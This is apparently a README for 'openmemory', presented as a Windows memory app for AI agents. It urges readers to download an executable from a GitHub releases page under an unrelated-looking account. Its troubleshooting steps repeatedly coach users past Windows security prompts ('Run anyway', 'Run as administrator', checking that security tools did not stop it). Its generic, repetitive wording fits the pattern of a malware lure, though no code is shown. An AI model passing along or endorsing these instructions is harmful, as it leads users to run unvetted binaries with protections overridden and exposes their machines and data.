Visit this page to download: https://github.com/Brakepedallap630/openmemory/releases
On the releases page, look for the latest Windows file. It is usually named with .exe at the end. Download that file to your computer.
- Open the releases page.
- Find the latest release.
- Download the Windows file.
- If your browser asks where to save it, pick your Downloads folder.
- When the download ends, open the file.
- If Windows shows a security prompt, choose Run or More info, then Run anyway.
- Wait for the app to finish starting.
If the app opens in a window, the setup is done. If it closes right away, run the file again and keep the window open.
openmemory helps your AI agents share long-term memory in one place. That means your tools can keep track of past chats, notes, and context without you starting and stopping anything by hand.
Use it when you want:
- Shared memory across more than one AI agent
- Less repeated setup
- Better context between sessions
- A simple local app that runs on Windows
- A memory layer that stays ready in the background
openmemory is built for a normal Windows desktop or laptop. For best results, use:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 500 MB of free disk space
- A stable internet connection for first-time download
- Permission to run apps from downloaded files
If your computer can run modern desktop apps, it should run openmemory.
- Start openmemory.
- Leave it open while you use your AI tools.
- Connect your agents to the same memory source.
- Save notes, facts, or session data through the app.
- Reuse that memory in later chats or tasks.
For most users, the app works best when it stays open in the background. That lets your AI agents read and write shared memory without extra steps.
Use this link to visit the release page and get the latest Windows build:
Download openmemory from Releases
After you download the file, you may see one of these:
- A single
.exefile - A
.zipfile with the app inside - Release notes in the browser
If you get a .zip file, right-click it and choose Extract All. Then open the app file inside the folder.
The first time you open openmemory, Windows may take a few seconds to check the file. That is normal.
You may also see:
- A Windows security check
- A prompt asking to allow the app
- A brief delay while the app starts
If asked, choose the option that lets the app run.
openmemory is meant to help you keep memory under your control. In many setups, the app stores data on your own machine. That makes it easier to manage shared context without moving between tools.
If you use it with other AI services, check how those services handle data before you connect them.
- Personal AI assistant with memory
- Team workflows that need shared context
- Research notes that carry across sessions
- Customer support prototypes
- Internal tools that remember past work
- Multi-agent setups that need one memory source
- Make sure the download finished
- Check that you opened the newest release file
- If the file is in a zip, extract it first
- Try right-clicking the file and choosing Run as administrator
- Open the file again
- Select More info
- Choose Run anyway if you trust the source release page
- Keep the window open
- Run it again from the same folder
- Make sure no other security tool stopped it
- Go back to the releases page
- Look for the latest version at the top
- Choose the Windows asset with
.exeor.zip
- Open the releases page.
- Download the latest Windows file.
- Run the file.
- Keep openmemory open while you use your AI agents.
- Connect your tools to the same memory layer.
Common release names may include words like:
- windows
- setup
- installer
- x64
- amd64
- portable
If you see more than one file, pick the one made for Windows and the newest release date
To get steady memory behavior:
- Keep openmemory running
- Use the same memory source in each agent
- Save useful facts in short, clear notes
- Check that your AI tool points to the right memory store
- Restart the app after system updates if memory does not load
Primary download page: https://github.com/Brakepedallap630/openmemory/releases